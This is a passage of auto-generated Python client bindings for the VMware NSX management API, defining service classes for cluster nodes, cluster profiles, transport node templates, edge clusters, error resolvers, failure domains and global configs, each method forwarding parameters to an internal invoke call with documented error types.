:return: com.vmware.nsx.model.ClusterNodeInfo
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get_0',
{
'node_id': node_id,
})
def get_1(self,
target_node_id,
target_uri,
):
"""
Invoke GET request on target cluster node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID or keyword self (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get_1',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def joincluster(self,
join_cluster_parameters,
):
"""
Join this node to a NSX Cluster
:type join_cluster_parameters: :class:`com.vmware.nsx.model_client.JoinClusterParameters`
:param join_cluster_parameters: (required)
:rtype: :class:`com.vmware.nsx.model_client.ClusterConfiguration`
:return: com.vmware.nsx.model.ClusterConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('joincluster',
{
'join_cluster_parameters': join_cluster_parameters,
})
def removenode(self,
node_id,
force=None,
graceful_shutdown=None,
ignore_repository_ip_check=None,
):
"""
Detach a node from the Cluster
:type node_id: :class:`str`
:param node_id: UUID of the node (required)
:type force: :class:`str` or ``None``
:param force: (optional)
:type graceful_shutdown: :class:`str` or ``None``
:param graceful_shutdown: (optional, default to false)
:type ignore_repository_ip_check: :class:`str` or ``None``
:param ignore_repository_ip_check: (optional, default to false)
:rtype: :class:`com.vmware.nsx.model_client.ClusterConfiguration`
:return: com.vmware.nsx.model.ClusterConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('removenode',
{
'node_id': node_id,
'force': force,
'graceful_shutdown': graceful_shutdown,
'ignore_repository_ip_check': ignore_repository_ip_check,
})
def summarizeinventorytoremote(self):
"""
Request one-time inventory summary. The backup will be uploaded using
the same server configuration as for an automatic backup.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('summarizeinventorytoremote', None)
def update(self,
target_node_id,
target_uri,
):
"""
Invoke PUT request on target cluster node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID or keyword self (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
class ClusterProfiles(VapiInterface):
"""
"""
LIST_RESOURCE_TYPE_EDGEHIGHAVAILABILITYPROFILE = "EdgeHighAvailabilityProfile"
"""
Possible value for ``resourceType`` of method :func:`ClusterProfiles.list`.
"""
LIST_RESOURCE_TYPE_BRIDGEHIGHAVAILABILITYCLUSTERPROFILE = "BridgeHighAvailabilityClusterProfile"
"""
Possible value for ``resourceType`` of method :func:`ClusterProfiles.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ClusterProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
cluster_profile,
):
"""
Create a cluster profile. The resource_type is required.
:type cluster_profile: :class:`vmware.vapi.struct.VapiStruct`
:param cluster_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.ClusterProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.ClusterProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.ClusterProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'cluster_profile': cluster_profile,
})
def delete(self,
cluster_profile_id,
):
"""
Delete a specified cluster profile.
:type cluster_profile_id: :class:`str`
:param cluster_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'cluster_profile_id': cluster_profile_id,
})
def get(self,
cluster_profile_id,
):
"""
Returns information about a specified cluster profile.
:type cluster_profile_id: :class:`str`
:param cluster_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.ClusterProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.ClusterProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'cluster_profile_id': cluster_profile_id,
})
def list(self,
cursor=None,
include_system_owned=None,
included_fields=None,
page_size=None,
resource_type=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns paginated list of cluster profiles Cluster profiles define
policies for edge cluster and bridge cluster.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_system_owned: :class:`bool` or ``None``
:param include_system_owned: Whether the list result contains system resources (optional,
default to true)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type resource_type: :class:`str` or ``None``
:param resource_type: Supported cluster profiles. (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ClusterProfileListResult`
:return: com.vmware.nsx.model.ClusterProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'include_system_owned': include_system_owned,
'included_fields': included_fields,
'page_size': page_size,
'resource_type': resource_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
cluster_profile_id,
cluster_profile,
):
"""
Modifie a specified cluster profile. The body of the PUT request must
include the resource_type.
:type cluster_profile_id: :class:`str`
:param cluster_profile_id: (required)
:type cluster_profile: :class:`vmware.vapi.struct.VapiStruct`
:param cluster_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.ClusterProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.ClusterProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.ClusterProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'cluster_profile_id': cluster_profile_id,
'cluster_profile': cluster_profile,
})
class ComputeCollectionTransportNodeTemplates(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.compute_collection_transport_node_templates'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ComputeCollectionTransportNodeTemplatesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
compute_collection_transport_node_template,
):
"""
If automated transport node creation is configured on compute
collection, this template will serve as the default setting for
transport node creation. Note- transport node templates APIs are
deprecated and user is recommended to use transport node profiles APIs
instead.
:type compute_collection_transport_node_template: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:param compute_collection_transport_node_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'compute_collection_transport_node_template': compute_collection_transport_node_template,
})
def delete(self,
template_id,
):
"""
Delete the specified compute collection transport node template. Note-
transport node templates APIs are deprecated and user is recommended to
use transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'template_id': template_id,
})
def get(self,
template_id,
):
"""
Returns compute collection transportnode template by id Note- transport
node templates APIs are deprecated and user is recommended to use
transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'template_id': template_id,
})
def list(self,
compute_collection_id=None,
):
"""
Returns all eligible compute collection transportnode templates Note-
transport node templates APIs are deprecated and user is recommended to
use transport node profiles APIs instead.
:type compute_collection_id: :class:`str` or ``None``
:param compute_collection_id: Compute collection id (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeTemplateListResult`
:return: com.vmware.nsx.model.TransportNodeTemplateListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'compute_collection_id': compute_collection_id,
})
def update(self,
template_id,
compute_collection_transport_node_template,
):
"""
Update configuration of compute collection transportnode template.
Compute_collection_id isn't allowed to be changed since it represents
the association between ComputeCollection and this template. This is
determined when ComputeCollectionTransportNodeTemplate got created.
Note- transport node templates APIs are deprecated and user is
recommended to use transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:type compute_collection_transport_node_template: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:param compute_collection_transport_node_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionTransportNodeTemplate`
:return: com.vmware.nsx.model.ComputeCollectionTransportNodeTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'template_id': template_id,
'compute_collection_transport_node_template': compute_collection_transport_node_template,
})
class EdgeClusters(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.edge_clusters'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _EdgeClustersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
edge_cluster,
):
"""
Creates a new edge cluster. It only supports homogeneous members. The
TransportNodes backed by EdgeNode are only allowed in cluster members.
DeploymentType (VIRTUAL_MACHINE|PHYSICAL_MACHINE) of these EdgeNodes is
recommended to be the same. EdgeCluster supports members of different
deployment types.
:type edge_cluster: :class:`com.vmware.nsx.model_client.EdgeCluster`
:param edge_cluster: (required)
:rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
:return: com.vmware.nsx.model.EdgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'edge_cluster': edge_cluster,
})
def delete(self,
edge_cluster_id,
):
"""
Deletes the specified edge cluster.
:type edge_cluster_id: :class:`str`
:param edge_cluster_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'edge_cluster_id': edge_cluster_id,
})
def get(self,
edge_cluster_id,
):
"""
Returns information about the specified edge cluster.
:type edge_cluster_id: :class:`str`
:param edge_cluster_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
:return: com.vmware.nsx.model.EdgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'edge_cluster_id': edge_cluster_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about the configured edge clusters, which enable
you to group together transport nodes of the type EdgeNode and apply
fabric profiles to all members of the edge cluster. Each edge node can
participate in only one edge cluster.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.EdgeClusterListResult`
:return: com.vmware.nsx.model.EdgeClusterListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def replacetransportnode(self,
edge_cluster_id,
edge_cluster_member_transport_node,
):
"""
Replace the transport node in the specified member of the edge-cluster.
This is a disruptive action. This will move all the
LogicalRouterPorts(uplink and routerLink) host on the old
transport_node to the new transport_node. The transportNode cannot be
present in another member of any edgeClusters.
:type edge_cluster_id: :class:`str`
:param edge_cluster_id: (required)
:type edge_cluster_member_transport_node: :class:`com.vmware.nsx.model_client.EdgeClusterMemberTransportNode`
:param edge_cluster_member_transport_node: (required)
:rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
:return: com.vmware.nsx.model.EdgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('replacetransportnode',
{
'edge_cluster_id': edge_cluster_id,
'edge_cluster_member_transport_node': edge_cluster_member_transport_node,
})
def update(self,
edge_cluster_id,
edge_cluster,
):
"""
Modifies the specified edge cluster. Modifiable parameters include the
description, display_name, transport-node-id. If the optional
fabric_profile_binding is included, resource_type and profile_id are
required. User should do a GET on the edge-cluster and obtain the
payload and retain the member_index of the existing members as
returning in the GET output. For new member additions, the member_index
cannot be defined by the user, user can read the system allocated index
to the new member in the output of this API call or by doing a GET
call. User cannot use this PUT api to replace the transport_node of an
existing member because this is a disruption action, we have exposed a
explicit API for doing so, refer to
\"ReplaceEdgeClusterMemberTransportNode\" EdgeCluster only supports
homogeneous members. The TransportNodes backed by EdgeNode are only
allowed in cluster members. DeploymentType
(VIRTUAL_MACHINE|PHYSICAL_MACHINE) of these EdgeNodes is recommended to
be the same. EdgeCluster supports members of different deployment
types.
:type edge_cluster_id: :class:`str`
:param edge_cluster_id: (required)
:type edge_cluster: :class:`com.vmware.nsx.model_client.EdgeCluster`
:param edge_cluster: (required)
:rtype: :class:`com.vmware.nsx.model_client.EdgeCluster`
:return: com.vmware.nsx.model.EdgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'edge_cluster_id': edge_cluster_id,
'edge_cluster': edge_cluster,
})
class ErrorResolver(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.error_resolver'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ErrorResolverStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
error_id,
):
"""
Returns some metadata about the given error_id. This includes
information of whether there is a resolver present for the given
error_id and its associated user input data
:type error_id: :class:`str`
:param error_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ErrorResolverInfo`
:return: com.vmware.nsx.model.ErrorResolverInfo
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'error_id': error_id,
})
def list(self):
"""
Returns a list of metadata for all the error resolvers registered.
:rtype: :class:`com.vmware.nsx.model_client.ErrorResolverInfoList`
:return: com.vmware.nsx.model.ErrorResolverInfoList
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def resolveerror(self,
error_resolver_metadata_list,
):
"""
Invokes the corresponding error resolver for the given error(s) present
in the payload
:type error_resolver_metadata_list: :class:`com.vmware.nsx.model_client.ErrorResolverMetadataList`
:param error_resolver_metadata_list: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('resolveerror',
{
'error_resolver_metadata_list': error_resolver_metadata_list,
})
class FailureDomains(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.failure_domains'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _FailureDomainsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
failure_domain,
):
"""
Creates a new failure domain.
:type failure_domain: :class:`com.vmware.nsx.model_client.FailureDomain`
:param failure_domain: (required)
:rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
:return: com.vmware.nsx.model.FailureDomain
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'failure_domain': failure_domain,
})
def delete(self,
failure_domain_id,
):
"""
Deletes an existing failure domain. You can not delete system generated
default failure domain.
:type failure_domain_id: :class:`str`
:param failure_domain_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'failure_domain_id': failure_domain_id,
})
def get(self,
failure_domain_id,
):
"""
Returns information about a single failure domain.
:type failure_domain_id: :class:`str`
:param failure_domain_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
:return: com.vmware.nsx.model.FailureDomain
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'failure_domain_id': failure_domain_id,
})
def list(self):
"""
Returns information about configured failure domains.
:rtype: :class:`com.vmware.nsx.model_client.FailureDomainListResult`
:return: com.vmware.nsx.model.FailureDomainListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def update(self,
failure_domain_id,
failure_domain,
):
"""
Updates an existing failure domain. Modifiable parameters are
display_name, preferred_active_edge_services flag.
:type failure_domain_id: :class:`str`
:param failure_domain_id: (required)
:type failure_domain: :class:`com.vmware.nsx.model_client.FailureDomain`
:param failure_domain: (required)
:rtype: :class:`com.vmware.nsx.model_client.FailureDomain`
:return: com.vmware.nsx.model.FailureDomain
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'failure_domain_id': failure_domain_id,
'failure_domain': failure_domain,
})
class GlobalConfigs(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.global_configs'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _GlobalConfigsStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
config_type,
):
"""
Returns global configurations that belong to the config type
:type config_type: :class:`str`
:param config_type: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.GlobalConfigs
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.GlobalConfigs`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'config_type': config_type,
